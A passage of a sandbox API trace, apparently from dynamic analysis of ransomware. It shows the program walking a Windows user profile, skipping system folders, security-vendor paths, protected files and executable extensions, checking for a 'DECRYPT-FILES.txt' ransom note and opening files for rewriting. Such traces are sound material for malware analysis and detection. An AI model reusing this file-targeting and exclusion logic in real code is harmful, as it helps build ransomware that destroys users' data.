(lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned 43 [0085.990] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*" [0085.990] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7536a150, ftCreationTime.dwHighDateTime=0x1d4d278, ftLastAccessTime.dwLowDateTime=0x9d129120, ftLastAccessTime.dwHighDateTime=0x1d4d51b, ftLastWriteTime.dwLowDateTime=0x9d129120, ftLastWriteTime.dwHighDateTime=0x1d4d51b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zUt2ThE-zNirRyoAwYp\\", cAlternateFileName="苟盅꬈썮ϲ")) returned 0xffffffff [0085.990] CloseHandle (hObject=0x430) returned 1 [0085.990] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0085.990] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0085.990] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0085.990] lstrcatW (in: lpString1="NetHood", lpString2="\\" | out: lpString1="NetHood\\") returned="NetHood\\" [0085.990] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NetHood\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\" [0085.990] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\Program Files") returned 0x0 [0085.990] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch=":\\Windows") returned 0x0 [0085.990] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\Games\\") returned 0x0 [0085.990] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.990] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.991] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.991] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.991] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.991] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\All Users") returned 0x0 [0085.991] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.991] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\Local Settings\\") returned 0x0 [0085.991] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\AppData\\Local") returned 0x0 [0085.991] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="AhnLab") returned 0x0 [0085.991] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0085.991] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned 38 [0085.991] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.991] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\\\jkbimi8.tmp") returned 50 [0085.991] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\nethood\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0085.991] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned 38 [0085.991] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0085.991] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\\\DECRYPT-FILES.txt") returned 56 [0085.991] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\nethood\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.992] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned 38 [0085.992] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*" [0085.992] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7536a150, ftCreationTime.dwHighDateTime=0x1d4d278, ftLastAccessTime.dwLowDateTime=0x9d129120, ftLastAccessTime.dwHighDateTime=0x1d4d51b, ftLastWriteTime.dwLowDateTime=0x9d129120, ftLastWriteTime.dwHighDateTime=0x1d4d51b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zUt2ThE-zNirRyoAwYp\\", cAlternateFileName="苟盅꬈썮ϲ")) returned 0xffffffff [0085.992] CloseHandle (hObject=0x430) returned 1 [0085.992] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0085.992] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="DECRYPT-FILES.txt") returned 1 [0085.992] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="autorun.inf") returned 1 [0085.992] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="boot.ini") returned 1 [0085.992] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="desktop.ini") returned 1 [0085.992] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ntuser.dat") returned 0 [0085.992] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0085.992] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="DECRYPT-FILES.txt") returned 1 [0085.992] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="autorun.inf") returned 1 [0085.992] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="boot.ini") returned 1 [0085.992] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="desktop.ini") returned 1 [0085.992] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="ntuser.dat") returned 1 [0085.992] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="iconcache.db") returned 1 [0085.992] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="bootsect.bak") returned 1 [0085.992] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="ntuser.dat.log") returned 1 [0085.992] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="thumbs.db") returned -1 [0085.992] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="Bootfont.bin") returned 1 [0085.992] lstrlenW (lpString="ntuser.dat.LOG1") returned 15 [0085.992] lstrcmpiW (lpString1="LOG1", lpString2="lnk") returned 1 [0085.992] lstrcmpiW (lpString1="LOG1", lpString2="exe") returned 1 [0085.992] lstrcmpiW (lpString1="LOG1", lpString2="sys") returned -1 [0085.992] lstrcmpiW (lpString1="LOG1", lpString2="dll") returned 1 [0085.992] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0085.992] lstrlenW (lpString="ntuser.dat.LOG1") returned 15 [0085.992] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0085.993] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="ntuser.dat.LOG1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" [0085.993] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.993] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.993] CloseHandle (hObject=0x0) returned 0 [0085.993] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.993] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0085.993] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="DECRYPT-FILES.txt") returned 1 [0085.993] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="autorun.inf") returned 1 [0085.993] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="boot.ini") returned 1 [0085.993] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="desktop.ini") returned 1 [0085.993] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="ntuser.dat") returned 1 [0085.993] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="iconcache.db") returned 1 [0085.993] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="bootsect.bak") returned 1 [0085.994] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="ntuser.dat.log") returned 1 [0085.994] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="thumbs.db") returned -1 [0085.994] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="Bootfont.bin") returned 1 [0085.994] lstrlenW (lpString="ntuser.dat.LOG2") returned 15 [0085.994] lstrcmpiW (lpString1="LOG2", lpString2="lnk") returned 1 [0085.994] lstrcmpiW (lpString1="LOG2", lpString2="exe") returned 1 [0085.994] lstrcmpiW (lpString1="LOG2", lpString2="sys") returned -1 [0085.994] lstrcmpiW (lpString1="LOG2", lpString2="dll") returned 1 [0085.994] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0085.994] lstrlenW (lpString="ntuser.dat.LOG2") returned 15 [0085.994] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0085.994] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="ntuser.dat.LOG2" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" [0085.994] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.994] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.994] CloseHandle (hObject=0x0) returned 0 [0085.994] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.995] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0085.995] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="DECRYPT-FILES.txt") returned 1 [0085.995] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="autorun.inf") returned 1 [0085.995] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="boot.ini") returned 1 [0085.995] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="desktop.ini") returned 1 [0085.995] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="ntuser.dat") returned 1 [0085.995] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="iconcache.db") returned 1 [0085.995] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="bootsect.bak") returned 1 [0085.995] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="ntuser.dat.log") returned 1 [0085.995] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="thumbs.db") returned -1 [0085.995] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="Bootfont.bin") returned 1 [0085.995] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 55 [0085.995] lstrcmpiW (lpString1="blf", lpString2="lnk") returned -1 [0085.995] lstrcmpiW (lpString1="blf", lpString2="exe") returned -1 [0085.995] lstrcmpiW (lpString1="blf", lpString2="sys") returned -1 [0085.995] lstrcmpiW (lpString1="blf", lpString2="dll") returned -1 [0085.995] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0085.995] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 55 [0085.995] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0085.995] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0085.995] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.995] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.995] CloseHandle (hObject=0x0) returned 0 [0085.995] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.996] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0085.996] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="DECRYPT-FILES.txt") returned 1 [0085.996] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="autorun.inf") returned 1 [0085.996] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="boot.ini") returned 1 [0085.996] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="desktop.ini") returned 1 [0085.996] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntuser.dat") returned 1 [0085.996] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="iconcache.db") returned 1 [0085.996] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="bootsect.bak") returned 1 [0085.996] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntuser.dat.log") returned 1 [0085.996] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="thumbs.db") returned -1 [0085.996] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="Bootfont.bin") returned 1 [0085.996] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 92 [0085.996] lstrcmpiW (lpString1="regtrans-ms", lpString2="lnk") returned 1 [0085.996] lstrcmpiW (lpString1="regtrans-ms", lpString2="exe") returned 1 [0085.996] lstrcmpiW (lpString1="regtrans-ms", lpString2="sys") returned -1 [0085.996] lstrcmpiW (lpString1="regtrans-ms", lpString2="dll") returned 1 [0085.996] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0085.996] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 92 [0085.996] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0085.996] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0085.996] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.996] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.997] CloseHandle (hObject=0x0) returned 0 [0085.997] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.997] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0085.997] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="DECRYPT-FILES.txt") returned 1 [0085.997] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="autorun.inf") returned 1 [0085.997] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="boot.ini") returned 1 [0085.997] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="desktop.ini") returned 1 [0085.997] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntuser.dat") returned 1 [0085.997] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="iconcache.db") returned 1 [0085.997] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="bootsect.bak") returned 1 [0085.997] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntuser.dat.log") returned 1 [0085.997] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="thumbs.db") returned -1 [0085.997] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="Bootfont.bin") returned 1 [0085.997] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 92 [0085.997] lstrcmpiW (lpString1="regtrans-ms", lpString2="lnk") returned 1 [0085.997] lstrcmpiW (lpString1="regtrans-ms", lpString2="exe") returned 1 [0085.997] lstrcmpiW (lpString1="regtrans-ms", lpString2="sys") returned -1 [0085.997] lstrcmpiW (lpString1="regtrans-ms", lpString2="dll") returned 1 [0085.997] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0085.997] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 92 [0085.997] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0085.997] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0085.997] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.998] CreateFileW 